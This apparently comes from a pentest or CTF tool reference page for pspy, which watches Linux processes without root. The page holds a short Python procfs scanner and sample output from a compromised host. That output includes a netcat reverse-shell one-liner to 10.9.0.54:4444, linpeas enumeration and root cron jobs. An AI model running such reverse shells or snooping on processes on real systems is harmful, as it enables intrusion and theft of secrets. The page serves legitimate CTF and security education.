Pspy
Description
pspy is a command-line tool designed to snoop on processes without needing root permissions. It lets you see commands run by other users, cron jobs, etc. as they execute. It is great for enumerating Linux systems in CTFs, and also for demonstrating to your colleagues why passing secrets as command-line arguments is a bad idea.
The tool gathers its information from procfs scans. Inotify watchers placed on selected parts of the file system trigger additional scans so that short-lived processes are caught.
Official page: https://github.com/DominicBreuker/pspy
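To show why no root privileges are needed, here is a minimal procfs scanner in the spirit of pspy, written as an added example for this page (it is not pspy's own code). It polls /proc on a fixed interval, without the inotify trigger, and reads only world-readable files; the /proc path and the 100 ms interval are assumptions matching the defaults shown in the example output below.

```python
"""Minimal pspy-style procfs snooper (added example, not pspy source).
/proc/<pid>/cmdline and /proc/<pid>/status are readable by every local user on a
default Linux system, which is exactly why secrets passed as arguments leak."""
import os
import time

PROC = "/proc"  # assumption: standard Linux procfs mount point


def parse_cmdline(raw):
    """argv in /proc/<pid>/cmdline is NUL-separated; an empty file means a kernel thread
    (the blank entries in pspy's initial scan)."""
    return " ".join(p.decode(errors="replace") for p in raw.split(b"\0") if p)


def parse_uid(status_text):
    """Real UID from the 'Uid:' line of /proc/<pid>/status (real, effective, saved, fs)."""
    for line in status_text.splitlines():
        if line.startswith("Uid:"):
            return int(line.split()[1])
    return -1  # malformed status file


def snapshot(proc=PROC):
    """One scan of procfs: {pid: (uid, cmdline)}. Processes may exit mid-scan; skip those."""
    procs = {}
    for name in os.listdir(proc):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            with open(f"{proc}/{pid}/cmdline", "rb") as f:
                cmd = parse_cmdline(f.read())
            with open(f"{proc}/{pid}/status") as f:
                uid = parse_uid(f.read())
        except (FileNotFoundError, ProcessLookupError, PermissionError):
            continue
        procs[pid] = (uid, cmd)
    return procs


def new_processes(before, after):
    """PIDs present in `after` but not in `before`: commands started between two scans."""
    return {pid: after[pid] for pid in after if pid not in before}


def watch(interval=0.1, proc=PROC):
    """Poll like pspy's 100 ms scan; without inotify, very short-lived processes can be missed."""
    seen = snapshot(proc)
    while True:
        time.sleep(interval)
        current = snapshot(proc)
        for pid, (uid, cmd) in new_processes(seen, current).items():
            print(f"CMD: UID={uid} PID={pid} | {cmd}")
        seen = current


if __name__ == "__main__":
    watch()
```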
Installation
- 32-bit big, static version: pspy32
- 64-bit big, static version: pspy64
- 32-bit small version: pspy32s
- 64-bit small version: pspy64s
The statically compiled files should work on any Linux system but are quite huge (~4MB). If size is an issue, try the smaller versions which depend on libc and are compressed with UPX (~1MB).
Example
jack@jack:/tmp$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/06/18 09:49:49 CMD: UID=0 PID=964 | /sbin/iscsid
2020/06/18 09:49:49 CMD: UID=0 PID=963 | /sbin/iscsid
2020/06/18 09:49:49 CMD: UID=0 PID=952 | /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
2020/06/18 09:49:49 CMD: UID=0 PID=923 | /usr/lib/snapd/snapd
2020/06/18 09:49:49 CMD: UID=0 PID=919 | /usr/lib/accountsservice/accounts-daemon
2020/06/18 09:49:49 CMD: UID=0 PID=913 | /usr/sbin/atd -f
2020/06/18 09:49:49 CMD: UID=108 PID=903 | /usr/sbin/rsyslogd -n
2020/06/18 09:49:49 CMD: UID=0 PID=900 | /usr/bin/lxcfs /var/lib/lxcfs/
2020/06/18 09:49:49 CMD: UID=0 PID=9 |
2020/06/18 09:49:49 CMD: UID=0 PID=897 | /lib/systemd/systemd-logind
2020/06/18 09:49:49 CMD: UID=0 PID=892 | /usr/sbin/acpid
2020/06/18 09:49:49 CMD: UID=111 PID=888 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
2020/06/18 09:49:49 CMD: UID=0 PID=886 | /usr/sbin/cron -f
2020/06/18 09:49:49 CMD: UID=0 PID=84 |
2020/06/18 09:49:49 CMD: UID=1000 PID=8321 | /bin/sh ./linpeas.sh -a
2020/06/18 09:49:49 CMD: UID=0 PID=83 |
2020/06/18 09:49:49 CMD: UID=0 PID=82 |
2020/06/18 09:49:49 CMD: UID=1000 PID=8190 | -bash
2020/06/18 09:49:49 CMD: UID=1000 PID=8189 | sshd: jack@pts/0
2020/06/18 09:49:49 CMD: UID=1000 PID=8127 | (sd-pam)
2020/06/18 09:49:49 CMD: UID=1000 PID=8126 | /lib/systemd/systemd --user
2020/06/18 09:49:49 CMD: UID=0 PID=8124 | sshd: jack [priv]
2020/06/18 09:49:49 CMD: UID=33 PID=8114 | /usr/bin/python3 -m http.server
2020/06/18 09:49:49 CMD: UID=33 PID=8102 | /bin/sh -i
2020/06/18 09:49:49 CMD: UID=33 PID=8098 | sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.0.54 4444 >/tmp/f
2020/06/18 09:49:49 CMD: UID=33 PID=8094 | /usr/sbin/apache2 -k start
2020/06/18 09:49:49 CMD: UID=33 PID=8093 | /usr/sbin/apache2 -k start
2020/06/18 09:49:49 CMD: UID=33 PID=8092 | /usr/sbin/apache2 -k start
2020/06/18 09:49:49 CMD: UID=33 PID=8091 | /usr/sbin/apache2 -k start
2020/06/18 09:49:49 CMD: UID=33 PID=8090 | /usr/sbin/apache2 -k start
2020/06/18 09:49:49 CMD: UID=33 PID=8089 | /usr/sbin/apache2 -k start
2020/06/18 09:49:49 CMD: UID=33 PID=8088 | /usr/sbin/apache2 -k start
2020/06/18 09:49:49 CMD: UID=0 PID=8 |
2020/06/18 09:49:49 CMD: UID=0 PID=737 | /sbin/dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
2020/06/18 09:49:49 CMD: UID=0 PID=7 |
2020/06/18 09:49:49 CMD: UID=0 PID=69 |
2020/06/18 09:49:49 CMD: UID=0 PID=64 |
2020/06/18 09:49:49 CMD: UID=0 PID=62 |
2020/06/18 09:49:49 CMD: UID=0 PID=61 |
2020/06/18 09:49:49 CMD: UID=0 PID=60 |
2020/06/18 09:49:49 CMD: UID=0 PID=59 |
2020/06/18 09:49:49 CMD: UID=0 PID=58 |
2020/06/18 09:49:49 CMD: UID=0 PID=57 |
2020/06/18 09:49:49 CMD: UID=0 PID=56 |
2020/06/18 09:49:49 CMD: UID=0 PID=55 |
2020/06/18 09:49:49 CMD: UID=0 PID=54 |
2020/06/18 09:49:49 CMD: UID=0 PID=53 |
2020/06/18 09:49:49 CMD: UID=0 PID=52 |
2020/06/18 09:49:49 CMD: UID=0 PID=51 |
2020/06/18 09:49:49 CMD: UID=0 PID=50 |
2020/06/18 09:49:49 CMD: UID=0 PID=5 |
2020/06/18 09:49:49 CMD: UID=102 PID=494 | /lib/systemd/systemd-timesyncd
2020/06/18 09:49:49 CMD: UID=0 PID=49 |
2020/06/18 09:49:49 CMD: UID=0 PID=433 | /lib/systemd/systemd-udevd
2020/06/18 09:49:49 CMD: UID=0 PID=420 |
2020/06/18 09:49:49 CMD: UID=0 PID=418 |
2020/06/18 09:49:49 CMD: UID=0 PID=417 |
2020/06/18 09:49:49 CMD: UID=0 PID=416 |
2020/06/18 09:49:49 CMD: UID=0 PID=415 |
2020/06/18 09:49:49 CMD: UID=0 PID=404 |
2020/06/18 09:49:49 CMD: UID=0 PID=4 |
2020/06/18 09:49:49 CMD: UID=0 PID=389 | /sbin/lvmetad -f
2020/06/18 09:49:49 CMD: UID=0 PID=377 |
2020/06/18 09:49:49 CMD: UID=0 PID=373 |
2020/06/18 09:49:49 CMD: UID=0 PID=359 | /lib/systemd/systemd-journald
2020/06/18 09:49:49 CMD: UID=0 PID=33 |
2020/06/18 09:49:49 CMD: UID=0 PID=320 |
2020/06/18 09:49:49 CMD: UID=0 PID=32 |
2020/06/18 09:49:49 CMD: UID=0 PID=31 |
2020/06/18 09:49:49 CMD: UID=0 PID=30 |
2020/06/18 09:49:49 CMD: UID=0 PID=3 |
2020/06/18 09:49:49 CMD: UID=0 PID=289 |
2020/06/18 09:49:49 CMD: UID=0 PID=288 |
2020/06/18 09:49:49 CMD: UID=1000 PID=27117 | ./pspy64
2020/06/18 09:49:49 CMD: UID=1000 PID=27084 |
2020/06/18 09:49:49 CMD: UID=0 PID=27 |
2020/06/18 09:49:49 CMD: UID=0 PID=262 |
2020/06/18 09:49:49 CMD: UID=0 PID=26 |
2020/06/18 09:49:49 CMD: UID=0 PID=25 |
2020/06/18 09:49:49 CMD: UID=0 PID=24 |
2020/06/18 09:49:49 CMD: UID=0 PID=23 |
2020/06/18 09:49:49 CMD: UID=0 PID=229 |
2020/06/18 09:49:49 CMD: UID=0 PID=22 |
2020/06/18 09:49:49 CMD: UID=0 PID=21 |
2020/06/18 09:49:49 CMD: UID=0 PID=20 |
2020/06/18 09:49:49 CMD: UID=0 PID=2 |
2020/06/18 09:49:49 CMD: UID=0 PID=19 |
2020/06/18 09:49:49 CMD: UID=0 PID=18 |
2020/06/18 09:49:49 CMD: UID=0 PID=17 |
2020/06/18 09:49:49 CMD: UID=0 PID=15 |
2020/06/18 09:49:49 CMD: UID=0 PID=143 |
2020/06/18 09:49:49 CMD: UID=0 PID=14 |
2020/06/18 09:49:49 CMD: UID=0 PID=13550 |
2020/06/18 09:49:49 CMD: UID=0 PID=13548 |
2020/06/18 09:49:49 CMD: UID=0 PID=13 |
2020/06/18 09:49:49 CMD: UID=0 PID=129 |
2020/06/18 09:49:49 CMD: UID=0 PID=1287 | logger -t mysqld -p daemon error
2020/06/18 09:49:49 CMD: UID=118 PID=1286 | /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --skip-log-error --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
2020/06/18 09:49:49 CMD: UID=0 PID=128 |
2020/06/18 09:49:49 CMD: UID=0 PID=127 |
2020/06/18 09:49:49 CMD: UID=0 PID=12613 |
2020/06/18 09:49:49 CMD: UID=0 PID=126 |
2020/06/18 09:49:49 CMD: UID=0 PID=125 |
2020/06/18 09:49:49 CMD: UID=0 PID=124 |
2020/06/18 09:49:49 CMD: UID=0 PID=123 |
2020/06/18 09:49:49 CMD: UID=0 PID=122 |
2020/06/18 09:49:49 CMD: UID=0 PID=121 |
2020/06/18 09:49:49 CMD: UID=0 PID=12 |
2020/06/18 09:49:49 CMD: UID=0 PID=1142 | /bin/bash /usr/bin/mysqld_safe
2020/06/18 09:49:49 CMD: UID=0 PID=1132 | /usr/sbin/apache2 -k start
2020/06/18 09:49:49 CMD: UID=0 PID=11 |
2020/06/18 09:49:49 CMD: UID=0 PID=1093 | /usr/sbin/sshd -D
2020/06/18 09:49:49 CMD: UID=0 PID=1079 | /usr/lib/policykit-1/polkitd --no-debug
2020/06/18 09:49:49 CMD: UID=0 PID=1078 | /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
2020/06/18 09:49:49 CMD: UID=0 PID=1070 | /sbin/agetty --noclear tty1 linux
2020/06/18 09:49:49 CMD: UID=0 PID=10 |
2020/06/18 09:49:49 CMD: UID=0 PID=1 | /sbin/init
2020/06/18 09:50:01 CMD: UID=0 PID=27131 | /usr/bin/python /opt/statuscheck/checker.py
2020/06/18 09:50:01 CMD: UID=0 PID=27130 | /bin/sh -c /usr/bin/python /opt/statuscheck/checker.py
2020/06/18 09:50:01 CMD: UID=0 PID=27129 | /usr/sbin/CRON -f
2020/06/18 09:50:01 CMD: UID=0 PID=27133 | sh -c /usr/bin/curl -s -I http://127.0.0.1 >> /opt/statuscheck/output.log
2020/06/18 09:50:01 CMD: UID=0 PID=27132 | sh -c /usr/bin/curl -s -I http://127.0.0.1 >> /opt/statuscheck/output.log
2020/06/18 09:52:01 CMD: UID=0 PID=27137 | /usr/bin/python /opt/statuscheck/checker.py
2020/06/18 09:52:01 CMD: UID=0 PID=27136 | /bin/sh -c /usr/bin/python /opt/statuscheck/checker.py
2020/06/18 09:52:01 CMD: UID=0 PID=27135 | /usr/sbin/CRON -f
2020/06/18 09:52:01 CMD: UID=0 PID=27139 | /usr/bin/curl -s -I http://127.0.0.1
2020/06/18 09:52:01 CMD: UID=0 PID=27138 | sh -c /usr/bin/curl -s -I http://127.0.0.1 >> /opt/statuscheck/output.log
2020/06/18 09:54:01 CMD: UID=0 PID=27143 | /usr/bin/python /opt/statuscheck/checker.py
2020/06/18 09:54:01 CMD: UID=0 PID=27142 | /bin/sh -c /usr/bin/python /opt/statuscheck/checker.py
2020/06/18 09:54:01 CMD: UID=0 PID=27141 | /usr/sbin/CRON -f
2020/06/18 09:54:01 CMD: UID=0 PID=27144 | /usr/bin/python /opt/statuscheck/checker.py
2020/06/18 09:54:01 CMD: UID=0 PID=27145 | sh -c /usr/bin/curl -s -I http://127.0.0.1 >> /opt/statuscheck/output.log